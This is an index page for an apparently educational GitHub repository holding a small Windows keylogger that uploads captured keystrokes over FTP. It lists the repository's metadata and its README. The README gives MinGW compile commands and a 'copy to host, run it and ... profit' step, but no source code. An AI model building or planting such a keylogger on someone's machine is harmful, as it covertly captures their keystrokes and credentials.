Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sighook/wxp78key
Tiny keylogger for Win XP/Vista/7/8 with ftp upload.
https://github.com/sighook/wxp78key
c educational educational-project ftp-upload keylogger keylogging mingw windows
Last synced: about 2 months ago
JSON representation
Tiny keylogger for Win XP/Vista/7/8 with ftp upload.
- Host: GitHub
- URL: https://github.com/sighook/wxp78key
- Owner: sighook
- Created: 2015-09-25T22:53:57.000Z (about 9 years ago)
- Default Branch: master
- Last Pushed: 2022-04-17T13:42:45.000Z (over 2 years ago)
- Last Synced: 2023-10-20T06:54:34.499Z (about 1 year ago)
- Topics: c, educational, educational-project, ftp-upload, keylogger, keylogging, mingw, windows
- Language: C
- Homepage:
- Size: 8.79 KB
- Stars: 15
- Watchers: 3
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
### About
A tiny keylogger with ftp upload.
Tested on Win XP, Win Vista, Win 7, Win 8.
### Usage
* copy `config.def.h` to `config.h` and edit
* compile1. Windows (*with MinGW*):
```
gcc.exe keylogger.c -lwsock32 -o -s -Os
```2. Linux (debian based):
```sh
sudo apt install gcc-mingw-w64-x86-64
x86_64-w64-mingw32-gcc keylogger.c -lwsock32 -o -s -Os
```* copy to host
* run it and ... profit **:)**### Note
* On **WinXP** log file has *CP1251* encoding
* On **Win7-Win8** log file has *UTF-16LE* encoding